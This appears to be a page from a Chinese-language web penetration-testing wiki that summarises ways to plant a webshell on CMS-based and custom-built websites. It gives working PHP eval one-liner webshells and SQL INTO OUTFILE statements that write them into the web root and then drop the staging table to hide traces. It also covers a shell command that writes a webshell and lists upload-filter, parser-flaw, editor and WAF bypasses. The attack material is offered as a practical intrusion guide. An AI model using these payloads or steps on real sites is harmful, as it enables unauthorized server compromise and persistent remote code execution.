[TOC]
# 获取Webshell思路总结
## 1️⃣CMS获取webshell方法:
### 1、什么是CMS?
CMS系统指的是内容管理系统。已经有别人开发好了整个网站的前后端,使用者只需要部署cms,然后通过后台添加数据,修改图片等工作,就能搭建好一个的WEB系统。
### 2、如何查看CMS相关信息?
1. 如果已经攻破后台,那么进入后台之后CMS系统有可能直接显示
2. 很多网站都会在网站的最下方信息中显示CMS版本信息
3. 通过web指纹识别扫描器扫描
常用的为御剑WEB指纹识别系统
4. 通过浏览器的插件查看指纹信息
火狐和Google推荐用wappalyzer
### 3、如何获取CMS的webshell?
找到网站使用的cms版本信息后,通过搜索引擎搜索,就可以得到相关版本获取webshell的方法
搜索关键字如:“wordpress拿webshell”。
## 2️⃣非CMS获取webshell:
更多的时候企业并不使用开源的CMS,而是选择自己开发源代码,这里的思路分为有权限和无权限两方面来分析
### 一、有管理权限的情况:
是指前期通过其他方法,已经破解了管理后台功能,可以使用管理后台的情况
#### **㈠、通过正常上传一句话小马获取webshell**
1. 检查网站是否过滤上传文件后缀格式,如果未过滤直接上传一句话小马即可。
2. 找到网站默认配置,将一句话小马插入配置中
因为有些网站没有对配置参数进行过滤,所以配置中的小马被读取后,就可能被连接
建议先下载该站源码,进行查看源码过滤规则,以防插马失败。
插马失败很有可能会导致网站被你的小马中没有闭合标签导致网站出错。注意要闭合原有的代码,保证语法正确,以免程序运行出错。
#### **㈡、利用后台数据库备份获取webshell**
一般网站都不允许上传脚本类型文件,如 asp、php、jsp、aspx等文件。但一般后台都会有数据库备份功能。步骤如下
1. 上传允许格式的小马(如图片马)
2. 找到文件上传后的文件路径
3. 通过数据库备份,指定备份源文件与与备份后格式。
如果后台限制了备份路径,可以尝试F12修改文本框元素
#### ㈢、通过花样上传一句话小马获取Webshell
使用BurpSuite 工具,%00截断、特殊名文件名绕过、文件名大小写绕过、黑白名单绕过等等,想尽一切办法就是要上传一句话木马,通过各种变形,万变不离其宗,换汤不换药。
#### ㈣、通过编辑模块、标签等拿WebShell
①通过对网站的**模块**进行编辑写入一句话,然后生成脚本文件拿WebShell
②通过将木马添加到压缩文件,把名字改为**网站模板类型**,上传到网站服务器,拿WebShell
#### ㈤、SQL命令获取
有一定的数据库权限的情况下,通过向数据库表写入马,然后备份该表为脚本文件的方式进行
**大致步骤:**
1. 创建表
2. 将一句话写入刚创建的表中
3. 查询一句话所在表到文件,成功将一句话写入文件
第一种方法:
```sql
CREATE TABLE `mysql`.`best` (`best1` TEXT NOT NULL );
#将一句话木马插入到mysql库best表best1字段
INSERT INTO `mysql`.`best` (`best1` ) VALUES ('<?php @eval($_POST[password]);?>');
#查询这个字段导出到网站的文件中
SELECT `best1` FROM `best` INTO OUTFILE 'd:/wamp/www/best.php';
#把痕迹清除
DROP TABLE IF EXISTS `best`;
```
第二种方法:
优先推荐,简单明了,且避免了误删别人的数据!
```sql
#直接将查询出来的语句写入文件
select '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/best3.php'
```
#### ㈥、利用解析漏洞拿WebShell
```
1)IIS5.x / 6.0 解析漏洞
2)IIS 7.0 / IIS 7.5 / Nginx <8.03 畸形解析漏洞
3)Nginx < 8.03 空字节代码执行漏洞
4)Apache 解析漏洞
```
其他的还有命令执行漏洞,反序列化漏洞等
#### ㈦、利用编辑器漏洞拿WebShell
利用网站的编辑器上传木马,搜索已知的编辑器漏洞,常见的编辑器有 fckeditor、ewebeditor、cheditor等,有时候没有管理员权限也可以拿下webshell。
#### ㈧、文件包含拿WebShell
1. 首先需要存在文件包含漏洞
2. 先将WebShell 改为txt格式文件上传
3. 然后上传一个脚本文件包含该txt格式文件
4. 通过这种方式,可绕过WAF拿WebShell
#### ㈨、上传其它脚本类型拿WebShell
1. 此类型用于一台服务器具有多个网站
a网站是asp的站,b可能是php的站,分别限制了asp和php文件的上传,可以尝试向A上传php的脚本,来拿Shell
2. 也可以尝试将脚本文件后缀名改为asa 或者在后面直接加个点(.)如"xx.asp.", 来突破文件类型限制进行上传拿WebShell
#### ㈩、修改网站上传类型配置来拿WebShell
某些网站,在网站上传类型中限制了上传脚本类型文件,我们可以去添加上传文件类型如添加asp | php | jsp | aspx | asa 后缀名来拿WebShell
### 二、非管理权限
* * *
#### ㈠、SQL注入漏洞
前提条件,具有足够权限,对写入木马的文件夹有写入权限,知道网站绝对路径
①可以通过log 备份、差异备份拿WebShell
②可以通过`into outfile`,`into outfile`函数(写入函数)将一句话木马写入,拿WebShell。
③利用phpmyadmin 将木马导出,拿WebShell
④利用连接外连的数据库拿WebShell
```
1. 要有file_priv权限
2. 知道文件绝对路径
3. 能使用union
4. 对web目录有读权限
5. 若过滤了单引号,则可以将函数中的字符进行hex编码
```
#### ㈡、xss和sql注入联合利用
有些输入框对一些符号过滤不严密(如<>,所以一般存在xss的地方就可以这么利用)我们可以在这里输入一句话`<?php @eval($_POST['CE']);?>`,之后再用数据库注入,查询到文件into file成功插入一句话木马
#### ㈢、IIS写权限拿WebShell
有些网站的管理员在配置网站权限的时候疏忽,导致我们有写权限,这种漏洞需要用工具来利用,已经很少见了,有专门的利用工具(桂林老兵)。
原理是通过找到有IIS 写入权限的网站(开启WebDeV),PUT进去一个.txt 格式的文件,目录必须有刻写的权限,如 image 文件夹,然后通过move 方法,把txt 格式的木马用move 成脚本格式。
#### ㈣、远程命令执行拿WebShell
在有php代码执行漏洞,例如一些框架漏洞的时候可以通过执行一些系统命令进行拿WebShell。执行命令行命令“写入如下内容到文件,会自动将创建木马文件并将一句话木马写入其中,使用菜刀连接即可。
```
echo ?php "@eval($_POST['CE']);?>" > x.php
```
#### ㈤、头像上传拿WebShell
大概思路:
①将大马放在文件夹中
②将文件夹压缩成压缩文件(zip)
③正常上传一个头像并且抓包
④将数据包中图片头像的内容部分删掉
⑤重新写入文件内容,将压缩文件写入到原本图片的位置
⑥上传,之后返回包中会告诉我们绝对路径
- src导航站
- kali和msf
- 信息收集
- 收集域名信息
- Whois 查询
- 备案信息查询
- 信用信息查询
- IP反查站点的站
- 浏览器插件
- 收集子域名信息
- 在线平台
- 工具枚举
- ssl与证书透明度
- DNS历史解析
- DNS域传送漏洞
- C段探测
- JS文件域名&ip探测
- 搜索引擎&情报社区
- google黑客
- 威胁情报
- 钟馗之眼
- 收集相关应用信息
- 微信公众号&微博
- APP收集&反编译
- 收集常用端口信息
- 常见端口&解析&总结
- 扫描工具
- 网络空间引擎搜索
- 浏览器插件
- nmap扫描
- 收集敏感信息
- 源码泄露
- 邮箱信息收集
- 备份文件泄露
- 目录&后台扫描
- 公网网盘
- 历史资产
- 指纹&WAF&CDN识别
- 指纹识别
- CDN识别
- 绕过CDN查找真实IP
- WAF识别
- 漏洞资源和社工
- 漏洞公共资源库
- 社会工程
- 资产梳理
- 各种对渗透有帮助的平台
- 扫描器
- 扫描器对比
- AppScan(IBM)_web和系统
- AWVS_web扫描
- X-Scan_系统扫描
- WebInspect_HP_WEB
- Netsparker_web
- WVSS_绿盟_web
- 安恒明鉴
- Nessus_系统
- nexpose_系统
- 启明天镜_web_系统
- SQL注入
- 常用函数
- sql注入步骤
- union注入和information_schema库
- 函数和报错注入
- SQL盲注
- 其他注入方式
- 防止SQL注入解决方案
- Access数据库注入
- MSSQL数据库注入
- MYSQL数据库注入
- 神器SQLmap
- xss跨站脚本攻击
- xss原理和分类
- xss案例和修复
- xss绕过技巧
- xss案例
- 文件上传下载包含
- 常有用文件路径
- 文件上传漏洞
- 文件下载漏洞
- 文件包含漏洞
- upload-labs上传漏洞练习
- XXE、SSRF、CSRF
- SSRF原理基础
- SSRF案例实战
- CSRF原理基础
- CSRF案例及防范
- XXE之XML_DTD基础
- XXE之payload与修复
- XXE结合SSRF
- 远程命令执行与反序列化
- 远程命令和代码执行漏洞
- 反序列化漏洞
- 验证码与暴力破解
- 爆破与验证码原理
- CS架构暴力破解
- BS架构暴力破解
- WEB编辑器漏洞
- 编辑器漏洞基础
- Ewebeditor编辑器
- FCKeditor编辑器
- 其他编辑器
- web中间件漏洞
- 中间件解析漏洞
- Tomcat常见的漏洞总结
- Jboss漏洞利用总结
- Weblogic漏洞利用总结
- WEB具体步骤
- 旁注和越权
- CDN绕过
- 越权与逻辑漏洞
- WEB应用常见其他漏洞
- WEB登陆页面渗透思路
- 获取WEBshell思路
- 社工、钓鱼、apt
- 社工和信息收集
- 域名欺骗
- 钓鱼邮件
- 一些钓鱼用的挂马工具
- 代码审计
- 代码审计工具
- WAF绕过
- WAF基础及云WAF
- 各种WAF绕过方法
- 绕过WAF上传文件
- 系统提权
- windows系统提权
- linux系统提权
- 数据库提权操作系统
- 内网横向渗透
- 内网穿透方式
- 一些内网第三方应用提权
- ARP与DOS
- ARP欺骗
- DOS与DDOS
- 一些DOS工具